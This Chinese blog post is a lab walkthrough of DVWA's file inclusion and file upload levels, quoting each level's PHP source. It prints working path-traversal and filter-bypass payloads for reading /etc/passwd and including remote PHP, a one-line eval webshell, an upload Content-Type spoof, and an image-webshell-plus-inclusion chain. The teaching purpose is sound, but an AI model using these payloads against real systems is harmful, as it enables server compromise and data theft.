DVWA 文件包含及上传漏洞

最新推荐文章于 2024-07-21 04:03:36 发布

CodeStarr

最新推荐文章于 2024-07-21 04:03:36 发布

阅读量2.1k

点赞数

分类专栏： web 文章标签：网络安全

本文链接：https://blog.csdn.net/Ga4ra/article/details/123336145

版权

web 专栏收录该内容

27 篇文章 1 订阅

订阅专栏

文章目录

1. DVWA File Inclusion
2. DVWA File upload

1. DVWA File Inclusion

Low level

url路径：

/dvwa/vulnerabilities/fi/index.php?page=include.php

可以看出page参数对应的php会被包含，尝试包含passwd：

/dvwa/vulnerabilities/fi/index.php?page=../../../../../etc/passwd

页面回显：

root:x:0:0:root:/root:/bin/bash 
...
telnetd:x:112:120::/nonexistent:/bin/false proftpd:x:113:65534::/var/run/proftpd:/bin/false statd:x:114:65534::/var/lib/nfs:/bin/false

并且在一开始访问page=../../../etc/passwd错误路径时，页面暴露了www的绝对路径：

Warning: include(../etc/passwd) [function.include]: failed to open stream: No such file or directory in /var/www/dvwa/vulnerabilities/fi/index.php on line 35

看下源码，没有对page参数做任何检查：

<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>

Medium level

用…/无法访问上级目录了。

源码：

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\\" ), "", $file );

?>

过滤了http://和https://，试图禁止包含远程文件；过滤…/，试图禁止包含本地文件。

很好绕过：

page=httphttp://://10.10.10.156/dvwa/vulnerabilities/fi/file1.php
Fatal error: Call to undefined function dvwaCurrentUser() in C:\phpstudy_pro\WWW\DVWA\vulnerabilities\fi\file1.php on line 9

虽然报错，但文件确实包含了。在服务端放个phpinfo.php:

page=htthttp://p://10.10.10.156/phpinfo.php

成功执行phpinfo()。

本地文件包含过滤也是可以绕过：

page=..././..././..././..././..././etc/passwd

High level

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
	// This isn't the page we want!
	echo "ERROR: File not found!";
	exit;
}
?>

high难度要求必须以file协议指定page。

windows版绕过（绝对路径已通过报错信息获得）：

page=file://C:\\phpstudy_pro\\WWW\\phpinfo.php

Impossible level

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
	// This isn't the page we want!
	echo "ERROR: File not found!";
	exit;
}

?>

直接白名单了，impossible。

2. DVWA File upload

先准备好一句话木马shell.php，参数123：

<?php eval($_GET(123)); ?>

Low level

直接上传，回显：

../../hackable/uploads/shell.php succesfully uploaded!

服务端的路径：

dvwa/vulnerabilities/upload/../../hackable/uploads/shell.php
->
dvwa/hackable/uploads/shell.php

访问dvwa/hackable/uploads/shell.php?123=phpinfo();，成功执行phpinfo().

查看源码，没有任何检查：

<?php
if( isset( $_POST[ 'Upload' ] ) ) {
	// Where are we going to be writing to?
	$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
	$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

	// Can we move the file to the upload folder?
	if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
		// No
		$html .= '<pre>Your image was not uploaded.</pre>';
	}
	else {
		// Yes!
		$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
	}
}
?>

Medium level

直接上传php后报错：

Your image was not uploaded. We can only accept JPEG or PNG images.

抓包修改type即可：

Content-Type: image/jpeg

查看源码，对type和size作了检查：

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
	// Where are we going to be writing to?
	$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
	$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

	// File information
	$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
	$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
	$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

	// Is it an image?
	if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
		( $uploaded_size < 100000 ) ) {

		// Can we move the file to the upload folder?
		if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
			// No
			$html .= '<pre>Your image was not uploaded.</pre>';
		}
		else {
			// Yes!
			$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
		}
	}
	else {
		// Invalid file
		$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
	}
}
?>

High level

这次只是修改type就不能绕过了。修改文件名为shell.jpg也不行。服务端应该是检查了文件头，所以需要制作图片木马，过程不赘述，之前的博客记录过。

上传后搭配本地文件包含漏洞，用webshell连接测试。

http://10.10.10.156/dvwa/vulnerabilities/fi/?page=file://C:\\phpstudy_pro\\WWW\\dvwa/hackable/uploads/picwebsh.png

这里需要注意的坑是，用蚁剑连接时，要先访问并登录一下，level改为high或更低。

Impossible Level

这个级别对图片进行了二次渲染，仅提取图片数据保存，一句话木马就被筛掉了。

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );


	// File information
	$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
	$uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
	$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
	$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
	$uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

	// Where are we going to be writing to?
	$target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
	//$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
	$target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
	$temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
	$temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

	// Is it an image?
	if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
		( $uploaded_size < 100000 ) &&
		( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
		getimagesize( $uploaded_tmp ) ) {

		// Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
		if( $uploaded_type == 'image/jpeg' ) {
			$img = imagecreatefromjpeg( $uploaded_tmp );
			imagejpeg( $img, $temp_file, 100);
		}
		else {
			$img = imagecreatefrompng( $uploaded_tmp );
			imagepng( $img, $temp_file, 9);
		}
		imagedestroy( $img );

		// Can we move the file to the web root from the temp folder?
		if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
			// Yes!
			$html .= "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
		}
		else {
			// No
			$html .= '<pre>Your image was not uploaded.</pre>';
		}

		// Delete any temp files
		if( file_exists( $temp_file ) )
			unlink( $temp_file );
	}
	else {
		// Invalid file
		$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
	}
}

// Generate Anti-CSRF token
generateSessionToken();

?>